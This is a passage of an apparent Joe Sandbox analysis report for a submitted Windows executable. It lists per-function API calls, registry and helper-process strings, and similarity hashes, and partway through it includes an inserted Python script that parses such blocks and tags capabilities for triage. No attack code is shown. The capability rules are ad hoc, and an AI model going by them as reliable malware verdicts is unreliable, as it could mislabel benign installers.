                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                              • API String ID: 971782779-3668018701
                                                              • Opcode ID: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                              • Instruction ID: 7edda302242157afef40b0e7c7e05039b068dedd9e36cd510e855ba872eb221a
                                                              • Opcode Fuzzy Hash: 2d89b570042f54901974877e938fd47b21837ccabee8972bdab534961fdf4a04
                                                              • Instruction Fuzzy Hash: D0D14574A001489FDB11EFA9D981BDDBBF4AF08304F50816AF904B7392C778AE45CB69
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,?,00000000,?,00000000,00454B0D,?,0045AB6A,00000003,00000000,00000000,00454B44), ref: 0045498D
                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A11
                                                              • RegQueryValueExA.ADVAPI32(0045AB6A,00000000,00000000,00000000,?,00000004,00000000,00454A57,?,0045AB6A,00000000,00000000,?,00000000,?,00000000), ref: 00454A40
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548AB
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548E4
                                                              • RegOpenKeyEx, xrefs: 00454910
                                                              • , xrefs: 004548FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$FormatMessageOpen
                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2812809588-1577016196
                                                              • Opcode ID: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                              • Instruction ID: 3b35aed17da8244e85d272d2923899a44a2159637523a8fd9e70e85f8d21f96a
                                                              • Opcode Fuzzy Hash: 742d62a6869efcab47093dbd07b67c32618791e42156db71d55ecd28429abb8c
                                                              • Instruction Fuzzy Hash: 23914871E44148ABDB10DF95C842BDEB7FCEB49309F50406BF900FB282D6789E458B69
                                                              APIs
                                                                • Part of subcall function 00459364: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004594FF
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 00459569
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459659,?,00000000,00000000,00000000), ref: 004595D0
                                                              Strings
                                                              • .NET Framework not found, xrefs: 0045961D
                                                              • .NET Framework version %s not found, xrefs: 00459609
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045951C
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00459583
                                                              • v4.0.30319, xrefs: 004594F1
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004594B2
                                                              • v2.0.50727, xrefs: 0045955B
                                                              • v1.1.4322, xrefs: 004595C2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Close$Open
                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                              • API String ID: 2976201327-446240816
                                                              • Opcode ID: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                              • Instruction ID: e7879d346446e6db82ad1067b50e8ffdd52b59a139ce3e0e88c8f748029a0227
                                                              • Opcode Fuzzy Hash: 06cdcde3b802fa8939e5b925d5f0cc04c3aa7329a2dd441772a6abba54712f42
                                                              • Instruction Fuzzy Hash: EB51A331A04148EBCB01DFA8C8A1BEE77A5DB59305F54447BA801DB353EA3D9E1ECB19
                                                              APIs
                                                              • CloseHandle.KERNEL32(?), ref: 00458A7B
                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
                                                              • GetExitCodeProcess.KERNEL32(?), ref: 00458AB6
                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458AFD
                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458B19
                                                              Strings
                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
                                                              • Helper process exited., xrefs: 00458AC5
                                                              • Helper isn't responding; killing it., xrefs: 00458A87
                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458AE3
                                                              • Helper process exited, but failed to get exit code., xrefs: 00458AEF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                              • API String ID: 3355656108-1243109208
                                                              • Opcode ID: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                              • Instruction ID: 3f2324d87e707cedf1d5c4e10b6e93e7b0b52df74c864805f1ac214018e434b5
                                                              • Opcode Fuzzy Hash: 5acb86a21610ff93fc26a18ca7688f4a609edf5baed34ffefeefbdc5f868b4c1
                                                              • Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
                                                              APIs
                                                                • Part of subcall function 0042DDE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045464F
                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546FF,?,00000000,004547C3), ref: 0045478B
                                                                • Part of subcall function 0042E8C8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454597
                                                              • RegCreateKeyEx, xrefs: 004545C3
                                                              • , xrefs: 004545B1
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454567
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2481121983-1280779767
                                                              • Opcode ID: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                              • Instruction ID: 93c55a0ab54dbcba353dd8d7ef9dbdddde8d62e860aeeeeaccb8ee2ace91ec52
                                                              • Opcode Fuzzy Hash: 1658ad98f5d652d8ab18f870bc50976d397f5a9f15be4283fc870004d2c294f4
                                                              • Instruction Fuzzy Hash: 49810F75A00209AFDB00DFD5C981BDEB7B8EB49309F10452AF900FB282D7789E45CB69
                                                              APIs
                                                                • Part of subcall function 004538BC: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                • Part of subcall function 004538BC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00496CCD
                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00496E21), ref: 00496CEE
                                                              • CreateWindowExA.USER32(00000000,STATIC,00496E30,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00496D15
                                                              • SetWindowLongA.USER32(?,000000FC,004964A8), ref: 00496D28
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC,00496E30), ref: 00496D58
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00496DCC
                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
                                                                • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                              • DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                              • API String ID: 1549857992-2312673372
                                                              • Opcode ID: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                              • Instruction ID: 18f462a79ff6f3765b6ab1b49dcd34ad23a8ddcce266b6658739bc0f5698dca4
                                                              • Opcode Fuzzy Hash: e4b2ecfcfa893ff17553470f1835d2c21342bacfaf5c8ca03e615e843d4af16f
                                                              • Instruction Fuzzy Hash: 61414C70A40208AFDF00EBA5DD42F9E7BB8EB08714F52457AF510F7291D7799E008B68
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleProc
                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
                                                              • API String ID: 4190037839-2312295185
                                                              • Opcode ID: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                              • Instruction ID: f42d7e7755912f49377b3a3c2778cbb45b18f2cdc7334bb7b0fb93ca3fe573dd
                                                              • Opcode Fuzzy Hash: 6084c433af3ee4d64f0cd9982e7ad42a34d4dd09e5920a5815d9b88696e74604
                                                              • Instruction Fuzzy Hash: E8213230B10225BBDB10EAE6DC51B9E76B8EB44308F90447BA504E7281E77CDE419B5C
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 004629FC
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
                                                              • GetWindowRect.USER32(?,00000000), ref: 00462A76
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                              • Instruction ID: 865a179037155f8fdabe2954c964c2dd38b7d55406d5d1e7c7801a7b23b437f8
                                                              • Opcode Fuzzy Hash: 49e394185691d1c2da29acdf0cb3719649ef4a9244e3d7219ece30713ed86938
                                                              • Instruction Fuzzy Hash: B7219575701B057BD610D6A88D85F3B36D8EB84715F094A2AF944DB3C1E6F8EC018B9A
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F194
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F20E
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                              • Instruction ID: 50a2e38ba83faf67dd7c56e8d7733487d454ef14a416094e89dadcccf0bf0910
                                                              • Opcode Fuzzy Hash: d786bd72f778b9cca068a569f688e0802e61ee9ccadb1309323c976dabd5d685
                                                              • Instruction Fuzzy Hash: 3821F279704710ABD300EA68ED41F3B37A9DB89714F88457AF944DB382DA79EC044BA9
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021E3858,00000000), ref: 00458C79
                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000), ref: 00458D55
                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021E3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                              • String ID: CreateEvent$TransactNamedPipe
                                                              • API String ID: 2182916169-3012584893
                                                              • Opcode ID: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                              • Instruction ID: 06b5d05a5e38ae799b2edb69ba26f0faef77b18cb4ad173b91f5c3c95d125767
                                                              • Opcode Fuzzy Hash: 7b509680db312d6d9eeee96a6ca75077f36d693cf911451bc7dd7bcd49c3517f
                                                              • Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
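The two function blocks above that matter most for triage are the one that stops the 64-bit helper process (TerminateProcess after a WaitForSingleObject with 0x2710 ms) and the one that talks to that helper over TransactNamedPipe. Those blocks are easier to work with when the report text is parsed rather than read. The following Python is an added example written for this page, not Joe Sandbox tooling and not code from the sample: it parses the "APIs / Strings / Similarity" lines of such blocks into records, decodes the hex argument tokens (so the 00002710 passed to WaitForSingleObject reads as a 10000 ms timeout), keeps "Part of subcall function" lines separate from the function's own calls, and tags each block with coarse capabilities. SAMPLE_REPORT is a constructed, abridged copy of the two blocks, and CAPABILITY_RULES is this example's own mapping, not a Joe Sandbox signature.

```python
# Added example for this page (not Joe Sandbox tooling, not code from the sample):
# parse the per-function "APIs / Strings / Similarity" blocks of a Joe Sandbox
# report into records, decode the hex arguments, and tag coarse capabilities.
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed excerpt: abridged copies of the helper-process block and the
# named-pipe block shown on this page.
SAMPLE_REPORT = """\
APIs
• CloseHandle.KERNEL32(?), ref: 00458A7B
• TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458A97
• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458AA5
Strings
• Stopping 64-bit helper process. (PID: %u), xrefs: 00458A6D
• Helper isn't responding; killing it., xrefs: 00458A87
Memory Dump Source
• Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
• Instruction Fuzzy Hash: 2F2130706087409AD720E779C44575BB6D49F08345F04CC2FF99AEB283DF78E8488B2A
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014), ref: 00458CD6
• GetLastError.KERNEL32(?), ref: 00458CE3
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000), ref: 0045349F
Similarity
• String ID: CreateEvent$TransactNamedPipe
• Instruction Fuzzy Hash: EF418E75A00608AFDB15DF95C981F9EB7F8EB48714F1044AAF900F72D2DA789E44CA28
"""

HEX = r"[0-9A-F]{8}"
API_RE = re.compile(rf"•\s*(?:Part of subcall function (?P<subfn>{HEX}): )?"
                    rf"(?P<name>\w+)\.(?P<dll>[\w.]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>{HEX})$")
STR_RE = re.compile(rf"•\s*(?P<text>.*), xrefs: (?P<ref>{HEX})$")
SIM_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+): (?P<val>.*)$")
NUM_RE = re.compile(rf"^(-?)({HEX})$")

# This example's own API-name -> triage-tag mapping (an assumption, not a
# Joe Sandbox signature).
CAPABILITY_RULES = {
    "process-kill": {"TerminateProcess"},
    "process-wait": {"WaitForSingleObject", "GetExitCodeProcess", "MsgWaitForMultipleObjects"},
    "named-pipe-ipc": {"TransactNamedPipe", "CreateNamedPipeA", "CallNamedPipeA"},
    "dynamic-api-resolve": {"GetProcAddress"},
}

@dataclass
class ApiCall:
    name: str
    dll: str
    args: list[str]
    ref: str                       # call-site address in the dump
    subcall_of: str | None = None  # set for "Part of subcall function X" lines

@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref)
    similarity: dict[str, str] = field(default_factory=dict)

def arg_value(token: str):
    """'?' -> None; 8-digit hex (with the report's leading '-') -> int;
    anything else (e.g. 'STATIC', 'kernel32.dll') -> the literal itself."""
    if token == "?":
        return None
    m = NUM_RE.match(token)
    if not m:
        return token
    return -int(m.group(2), 16) if m.group(1) else int(m.group(2), 16)

def parse_blocks(text: str) -> list[FunctionBlock]:
    """'APIs' opens a block; 'Strings'/'Similarity' switch sections; any other
    non-bullet line (e.g. 'Memory Dump Source') ends the section so its bullets are skipped."""
    blocks: list[FunctionBlock] = []
    cur, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "apis"
        elif line in ("Strings", "Similarity"):
            section = line.lower()
        elif not line.startswith("•"):
            section = None
        elif cur is None or section is None:
            continue
        elif section == "apis" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["dll"], args, m["ref"], m["subfn"]))
        elif section == "strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "similarity" and (m := SIM_RE.match(line)):
            cur.similarity[m["key"]] = m["val"]
    return blocks

def tag_capabilities(block: FunctionBlock, include_subcalls: bool = False) -> set[str]:
    """Tags for the APIs the function calls itself; subcall lines belong to a callee."""
    names = {a.name for a in block.apis if include_subcalls or a.subcall_of is None}
    return {tag for tag, apis in CAPABILITY_RULES.items() if names & apis}

def wait_timeouts_ms(block: FunctionBlock) -> list[int]:
    """Decoded dwMilliseconds of every WaitForSingleObject call in the block."""
    out = []
    for a in block.apis:
        if a.name == "WaitForSingleObject" and len(a.args) > 1:
            v = arg_value(a.args[1])
            if isinstance(v, int):
                out.append(v)
    return out

if __name__ == "__main__":
    for b in parse_blocks(SAMPLE_REPORT):
        print([a.name for a in b.apis if a.subcall_of is None],
              sorted(tag_capabilities(b)), wait_timeouts_ms(b))
```

Feeding the whole report text through parse_blocks gives one record per function, which can then be grouped by Instruction Fuzzy Hash or API ID to match functions across samples; subcall lines are kept but excluded from tagging by default so that a callee's GetLastError does not inflate every caller's capability set.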
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
